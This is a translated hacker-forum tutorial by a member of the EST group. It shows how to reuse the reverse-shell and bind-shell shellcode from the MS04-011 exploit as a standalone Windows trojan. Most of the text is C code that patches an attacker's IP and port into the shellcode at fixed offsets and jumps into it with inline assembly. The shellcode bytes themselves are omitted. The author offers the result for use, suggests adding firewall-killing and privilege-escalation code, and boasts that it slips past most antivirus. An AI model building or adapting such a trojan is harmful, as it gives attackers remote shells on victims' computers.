From ms04011 to sunlion Trojan V1.0

************************************************
* Author: sunlion [est]   Hut: http://evilsun.126.com
* Organization: China Evil Octal (EST) http://www.eviloctal.com   Forum: http://www.eviloctal.com/forum
* Reprinted: please retain the author information
************************************************
A few days ago I saw someone write a small reverse-connect program and thought it was neat, so I wanted to write one myself. Only when I actually started did I find that such a program is not that simple. I am a newbie, after all, a really green EST newbie who doesn't know much at all!
My idea was that the parameters given when the program runs would be sent back to us. Well, I thought about it myself: could such a program get privileges? No. The permission you get is not admin permission, so developing such a program from scratch would not work at my current level!
I am a newbie, but I have the courage and confidence to improve!
It's fine in principle, but not that easy to implement! Then I thought of the original winshell.exe source, which, remember, is the work of the Lonely Swordsman. Haha, it's a pretty cool little program. So I read the winshell code several times that day, basically understood winshell's principles and functions, and used some of its methods. Oh, it really wasn't easy: it uses a lot of functions that I had to look up again and again. Then I had a class I couldn't skip, so I couldn't read the code in the dormitory, and in the end I printed it out, 22 pages, which cost me quite a bit!
After reading the winshell code I found that its principle differs from what we need. Still, reading it was a big win: it shows how to register a trojan as a system service and so on. The code in it is really rich and useful, haha!
Finally I thought of the ms04011.exe overflow program. Everyone knows this exploit: as long as the target computer has the ms04011 vulnerability, I can use NC locally to listen on a port and have the target connect back to my machine, so we get a shell on the other side. Well, what are you waiting for? So I went through all the code in the exploit section of the EST forum, and finally found the ms04011 source on the last few pages. Haha!
It uses n-plus functions, so I checked them one by one. I was exhausted, huh, but I still read through it for my program! Okay, let's get to it and look at the ms04011 code. I won't post all of it because it's too long. If there is a function you don't recognise, go to the EST forum and find the post in the C language section named <XXXX in the C language programming site>; there you can basically find every function you don't know, so look them up yourself :)! I posted that to the EST forum after checking the functions in ms04011. The following code is analysed:
Usage: expl <target> <victim ip> <bindport> [connectback IP] [Options]
Let's look at its usage first. Notice the <bindport> [connectback IP] arguments: that is the part we want to use, and we only need one piece of the program. Open the code and the shellcode appears: unsigned char reverseshell[]; unsigned char bindshell[]; char req1[]; char req2[] ... Once the shellcode has been assigned, the program that follows can be called!
... (program omitted) ...
int main(int argc, char *argv[])
Now we reach its main function. argc counts the number of arguments following our program, and argv[] is an array of character pointers holding the arguments the program was run with. In detail:
* argc: integer. The number of command line arguments passed to main() when the program runs.
* argv: string array. In DOS 3.x, argv[0] is the full path name of the running program; in versions earlier than DOS 3.0, argv[0] is an empty string ("").
argv[1] is the first string after the program name on the DOS command line;
argv[2] is the second string after the program name;
...
argv[argc] is NULL. The main function itself is not that interesting, but it matters for the code I want to analyse, ... (intermediate program omitted) ... and then the following code comes:
if (argc > 4)                                    // first check the number of arguments: more than 4 means bind mode or reverse mode
    if (!memcmp(argv[4], "-t", 2)) opt = 1;      // if the argument is -t, opt = 1 and a port is bound on the other side; without -t, opt stays 0 (its initial value) and the target connects back to our port
if ((argc > 4) && !opt) {                        // the program initialises opt to 0, so when opt == 0, !opt is true
    port = htons(atoi(argv[3])) ^ (USHORT)0x9999;    // get the input port
    ip = inet_addr(argv[4]) ^ (ULONG)0x99999999;     // get the input IP address
    memcpy(&reverseshell[118], &port, 2);        // copy the port into the shellcode in memory
    memcpy(&reverseshell[111], &ip, 4);          // copy the IP address into the shellcode in memory
    sc = reverseshell;                           // assign the reverse shellcode we defined to sc
} else {                                         // opt == 1 means -t was given: bind-port mode
    port = htons(atoi(argv[3])) ^ (USHORT)0x9999;    // get the input port
    memcpy(&bindshell[176], &port, 2);           // copy the port into the shellcode in memory
    sc = bindshell;                              // assign the bindshell shellcode we defined to sc
}
By this point we basically understand how ms04011 binds a port or connects back to our computer: the important part is the two shellcodes defined above, unsigned char reverseshell[] and unsigned char bindshell[]. There is a lot more code below, but I won't analyse it because it is of no use for writing a trojan.
So we can conclude that ms04011 can bind a port or connect back to our computer, and that this is down to the shellcode. What is shellcode, and why does running it connect back to our computer and give us a shell? Honestly it is hard to explain clearly, because I don't understand it that well myself! I looked it up:
Shellcode generally gains execution through an overflow and, while running, calls APIs of the target system to do its work, so it needs a generic way of finding the addresses of the target's API functions. Secondly, because its load address is hard to predict, it has to address its data dynamically. In addition, shellcode is usually delivered to the attacked program as data; ms04011 sends the shellcode to the target computer in exactly this way. What we want is to use the shellcode as a trojan that the other side executes, so that it creates a WinSock connection to our computer and we get our access; that is why we get a shell. The two popular ways of writing and extracting shellcode today are C and assembly. ms04011 embeds the encoded shellcode in the program as the two arrays we just saw, which is enough for our purpose. Of course shellcode cannot be explained in a sentence or two; put simply, as long as we execute a particular piece of shellcode we get our shell, so we can treat shellcode as a subroutine in assembly! Now our idea is clear. How do we make the other side execute our shellcode? Anyone who has learned assembly knows that to run a subroutine you write call Pn (Pn is the label of a subroutine we define; the label is the entry of the subroutine, i.e. its offset within the CS code segment). So when we want our trojan to execute this shellcode, call cannot be used directly in VC, because it is an assembly mnemonic that VC itself does not provide, so we embed assembly in VC with __asm {} to execute the shellcode that is already loaded in memory.
Haha, sunlion [est] only starts the assembly course this semester, but I did a lot of research on win32asm a few days ago and finally put it to use here! Okay, that's how it works!
Now we write the trojan ourselves. The shellcode is already there: reverseshell[] and bindshell[] from ms04011. As long as we execute this code we get our shell, but we all want to know why ms04011 can bind a port or connect to our computer. Those functions are inside the shellcode. So why does ms04011 read the IP address and port from its arguments, and why does it write them into the shellcode? (Is that easy to understand? Silly: if we didn't put the IP address and port in, the other side would have nothing to connect to after running the shellcode. So we write them in, and once the computer runs the shellcode it creates a Winsock connection to the IP address and port we set!)
In fact the main working principle of this trojan is now clear, and friends who know programming can probably write their own from here. Now let me show you my ugly version :)!
First, the headers: #include <windows.h>
#include <stdio.h>   // printf; atoi and memcpy also need stdlib.h and string.h
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32")   // link the Winsock library needed to create a socket
Next, the shellcode, taken straight from ms04011:
// Reverse shellcode: the port for the reverse connection is inserted at offset 118 and the IP address at offset 111.
unsigned char reverseshell[] = /* ms04011 reverse shellcode bytes omitted here */ "";
// Bind shellcode: the shellcode we need for an active connection; the port is inserted at offset 176.
unsigned char bindshell[] = /* ms04011 bind shellcode bytes omitted here */ "";
Then write the main part of the function:
void main(int argc, char *argv[])
{
    unsigned short port;    // the port
    // unsigned short stag;
    unsigned long ip;       // the IP address
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);   // initialise Winsock, requesting version 2.2
    if (argc == 2)          // decide between active and reverse connection: argc == 2 means I want an active (bind) connection
    {
        port = htons(atoi(argv[1])) ^ (USHORT)0x9999;   // derive the port value from the port I typed in
        memcpy(&bindshell[176], &port, 2);              // copy it to offset 176 of bindshell in memory
        __asm                                           // here we drop into assembly
        {
            lea eax, bindshell  // get the address of bindshell in memory
            jmp eax             // unconditional jump into bindshell so the system runs our prepared shellcode
        }
    }
    else if (argc == 3)     // here I want a reverse connection
    {
        port = htons(atoi(argv[1])) ^ (USHORT)0x9999;   // derive the port
        ip = inet_addr(argv[2]) ^ (ULONG)0x99999999;    // derive the IP address
        memcpy(&reverseshell[118], &port, 2);           // copy the port to offset 118 of the shellcode in memory
        memcpy(&reverseshell[111], &ip, 4);             // copy the IP address to offset 111
        __asm
        {
            lea eax, reverseshell   // get the address and store it in eax
            jmp eax                 // jump there and execute
        }
    }
    else printf("active connection usage: evilsun <listenport>\nreverse connection usage: evilsun <connectbackport> <connectbackip>\n");   // if the argument count is neither 2 nor 3, print the usage
}
The basic framework of this program is done!
If you already know something about trojans you will see it!
Actually, getting this far was not easy. When we read ms04011 we didn't feel anything the first couple of times through, but remember what the teacher said (... omitted, haha, I'm not telling :); I finally read the code very carefully and started to think about how to use the ms04011 code. Don't think I knew from the start how to use the code in ms04011; if you read it carefully yourself you will feel what I mean, it's not that easy, huh huh!
The ghost code is the program mentioned in the article "Using CCProxy vulnerabilities to get free Internet access". I wrote all of that program's functions into it, a dozen or so K of code, and published the code in the "member original" section of the EST forum. That part of the code escalates privileges and kills processes; you only need to use your brain to add the function of killing and disabling the firewall here!
In fact a trojan is not that simple; what I have covered here is just the skeleton. To improve the trojan we need a trojan generator. Guilin Veteran wrote a trojan very similar to mine, and I have one of his trojans. He said he would not publish it. Haha, if you want it, ask Guilin Veteran! He has written the generator: you can define the port and IP, and set a password for the active connection!
It took me almost a week to write this program. Haha, my English Level 4 test is coming up; I didn't pass it last time (TMD), so I have to work hard this time, which means I do not expect to upgrade sunlion's personal trojan V1.0 for the time being!
If you want something to play with, ask Guilin Veteran. Haha, you must add him on QQ; his QQ number is on his website! Pester him every day and I guess he will give you a trojan!
I would like to thank everyone for their patience; they helped me a lot while I was reading the code. Thank you! I wanted to write a trojan generator myself, but it was not easy; the key problem was that I couldn't do it on my own. To get help writing the generator for this trojan I had a heated discussion with him and wore him out. Haha, so I would also like to thank the developers of the famous Eighth Army!
Haha, after finishing I asked fengze [est] to test it. 5555555! fengze's Norton recognised it and flagged it as ms04011. Ugh! I guess fengze's virus database is fairly complete; it wasn't detected by other antivirus products!
That's all for this article!
